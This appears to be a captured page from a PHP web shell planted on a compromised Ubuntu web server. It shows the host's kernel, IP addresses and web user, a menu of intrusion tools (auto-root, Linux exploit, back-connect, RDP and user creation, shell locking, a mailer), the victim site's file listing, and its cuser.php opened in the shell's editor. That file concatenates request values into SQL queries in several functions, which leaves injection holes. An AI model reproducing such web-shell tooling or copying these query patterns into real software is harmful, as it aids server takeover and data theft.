Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.117.52
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
gfgcg /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
phpmailer
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
19.26
KB
-rwxr-xr-x
cManualMailer.php
1.52
KB
-rwxr-xr-x
caccesscontext.php
1.24
KB
-rwxr-xr-x
cappcontext.php
2.66
KB
-rwxr-xr-x
cmailer.php
6.83
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
514
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.35
KB
-rwxr-xr-x
dropdown.php
844
B
-rwxr-xr-x
feehead.php
1.51
KB
-rwxr-xr-x
format.php
7.43
KB
-rwxr-xr-x
getdata.php
1.06
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
home.html
14.48
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
login.php
1.63
KB
-rwxr-xr-x
mregistry.php
1.94
KB
-rwxr-xr-x
reportapplicationform.php
19.59
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
servfee.php
1.38
KB
-rwxr-xr-x
servicedet.php
1.6
KB
-rwxr-xr-x
site-data.php
35.91
KB
-rwxr-xr-x
stringspliter.php
693
B
-rwxr-xr-x
student.php
21.88
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cuser.php
<?php require_once( APP_SRC_G . "/cappcontext.php"); class CUser { public $mobj_context = NULL; public $marr_data; function __construct($aobj_context = NULL) { $this->mobj_context = $aobj_context; } function Clear($aint_uid = 0) { # this will get us an empty array with the table field structure $this->RetrieveById($aint_uid); } function Save() { #print_r($this->marr_data); # write whatever is there in the marr_data to db # insert / update based on the "name" field $lbool_result = $this->mobj_context->mobj_db->Replace ( "sl_users", $this->marr_data, "name", true ); $this->mobj_context->mobj_data["activation_id"] = $this->GetLastID(); #print_r($lbool_result . "::" . $this->mobj_context->mobj_db->ErrorNo() . " - " . $this->mobj_context->mobj_db->ErrorMsg()); return ($lbool_result); } function GetLastID() { return ($this->mobj_context->mobj_db->Insert_ID()); } function DeleteByID($aint_id) { $this->mobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $this->mobj_context->mobj_db->Execute("delete from sl_users where user_id = ". $aint_id); return ($this->mobj_context->mobj_db->Affected_Rows() == 1); } function Activate($astr_activationcode) { $lbool_result = $this->mobj_context->mobj_db->AutoExecute( "sl_users", array("is_active"=>true), "UPDATE", "md5(user_id) = '".$astr_activationcode."'" ) && ($this->mobj_context->mobj_db->Affected_Rows() <> 0); return($lbool_result); } function DeActivate($astr_activationcode) { return ( $this->mobj_context->mobj_db->AutoExecute ( "sl_users", array("is_active"=>false), "UPDATE", "user_id = $astr_activationcode" ) ); } function RetrieveByName($astr_name = "") { /* * Desc : retrieves the first record matching the firstname * returns : true on success and sets the marr_data with user info. / false on failure */ $lbool_result = false; $this->mobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $astr_name = mysql_real_escape_string($astr_name); $lobj_rs = $this->mobj_context->mobj_db->Execute("select * from sl_users where name = '".$astr_name."'"); if($lobj_rs) $this->marr_data = $lobj_rs->fields; $lbool_result = (isset($this->marr_data) && !empty($this->marr_data)); return ($lbool_result); } function RetrieveById($aint_id = "") { /* * Desc : retrieves the first record matching the firstname * returns : true on success and sets the marr_data with user info. / false on failure */ $lbool_result = false; $this->mobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $lobj_rs = $this->mobj_context->mobj_db->Execute("select * from sl_users where user_id = ". $aint_id); if($lobj_rs) { $this->marr_data = $lobj_rs->fields; $lbool_result = true; } return ($lbool_result); } function Data($astr_key = "") { if(isset($astr_key) && !empty($astr_key)) return $this->marr_data[$astr_key]; else return $this->marr_data; } } ?>
Close